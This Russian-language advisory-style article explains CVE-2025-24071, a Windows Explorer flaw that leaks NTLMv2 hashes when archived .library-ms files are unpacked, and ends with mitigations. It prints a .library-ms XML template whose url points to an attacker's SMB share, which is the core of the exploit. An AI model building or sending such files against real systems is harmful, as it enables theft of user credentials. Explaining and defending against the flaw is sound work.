
CVE-2025-24071: Утечка NTLM-хешей через проводник Windows
CVE-2025-24071 – это уязвимость в проводнике Windows, позволяющая злоумышленникам удаленно получать NTLMv2-хеши учетных записей пользователей. Эта уязвимость связана с автоматической обработкой файлов .library-ms
при распаковке архивов и может быть использована без участия пользователя.
Как работает уязвимость?
Проводник Windows автоматически анализирует файлы .library-ms
при их обнаружении, например, при распаковке архива. Файлы .library-ms
представляют собой XML-файлы, описывающие библиотеки Windows, и могут содержать ссылки на сетевые ресурсы, в том числе SMB-ресурсы.
Уязвимость возникает, когда вредоносный файл .library-ms
содержит ссылку на SMB-ресурс, контролируемый злоумышленником. При распаковке архива, содержащего такой файл, Windows автоматически инициирует NTLM-аутентификацию на сервере злоумышленника без какого-либо взаимодействия с пользователем. В процессе NTLM-аутентификации на сервер злоумышленника отправляется NTLMv2-хеш учетной записи пользователя, который может быть использован для дальнейших атак, например, для взлома пароля или для атак типа "pass-the-hash".
Условия для эксплуатации
Для успешной эксплуатации CVE-2025-24071 необходимо соблюдение следующих условий:
-
Уязвимая версия Windows: На целевой системе должна быть установлена уязвимая версия Windows. К уязвимым версиям относятся:
- Windows 10
- Windows 11
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server 2022
- Windows Server 2025
-
Распаковка архива с вредоносным файлом
.library-ms
: Пользователь должен распаковать архив, содержащий вредоносный файл.library-ms
. Это может произойти, если пользователь загрузит архив с вредоносного веб-сайта, получит его по электронной почте или скопирует с зараженного носителя. -
Доступ к SMB-ресурсу злоумышленника: Система должна иметь возможность установить соединение с SMB-ресурсом, указанным во вредоносном файле
.library-ms
.
Как работает эксплоит?
Общедоступный эксплоит на Java автоматизирует процесс создания вредоносного файла .library-ms
и упаковки его в ZIP-архив.
-
Запрос информации у пользователя: Скрипт запрашивает у пользователя имя файла и IP-адрес сервера злоумышленника.
-
Создание файла
.library-ms
: Скрипт создает XML-файл.library-ms
, содержащий ссылку на SMB-ресурс на сервере злоумышленника. В XML-файле используется тег<url>
, чтобы указать путь к SMB-ресурсу.<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <searchConnectorDescriptionList> <searchConnectorDescription> <simpleLocation> <url>\\\\<IP-адрес>\\shared</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>
-
Создание ZIP-архива: Скрипт создает ZIP-архив, содержащий созданный файл
.library-ms
. -
Удаление файла
.library-ms
: Скрипт удаляет созданный файл.library-ms
после упаковки его в ZIP-архив.
Защита от CVE-2025-24071
Для защиты от CVE-2025-24071 рекомендуется принять следующие меры:
-
Установите обновления Windows: Microsoft выпустила исправления для CVE-2025-24071. Установите последние обновления Windows, чтобы устранить уязвимость.
-
Будьте осторожны с архивами: Не распаковывайте архивы, полученные из ненадежных источников.
-
Блокируйте исходящий трафик SMB: Заблокируйте исходящий трафик SMB (порты 139 и 445) на межсетевом экране, если это возможно. Это предотвратит отправку NTLM-хешей на сервер злоумышленника.
-
Используйте надежные пароли: Используйте надежные и уникальные пароли для всех учетных записей. Если злоумышленник перехватил NTLMv2-хеш, он может попытаться взломать пароль, используя методы brute-force или rainbow tables. Надежный пароль (длинный, сложный, случайный) значительно усложняет процесс взлома хеша. Чем сложнее пароль, тем больше времени и вычислительных ресурсов потребуется злоумышленнику для его взлома.
-
Включите многофакторную аутентификацию: Включите многофакторную аутентификацию для всех учетных записей, где это возможно.
-
Мониторинг сетевого трафика: Мониторьте сетевой трафик на предмет подозрительной активности, связанной с NTLM-аутентификацией.
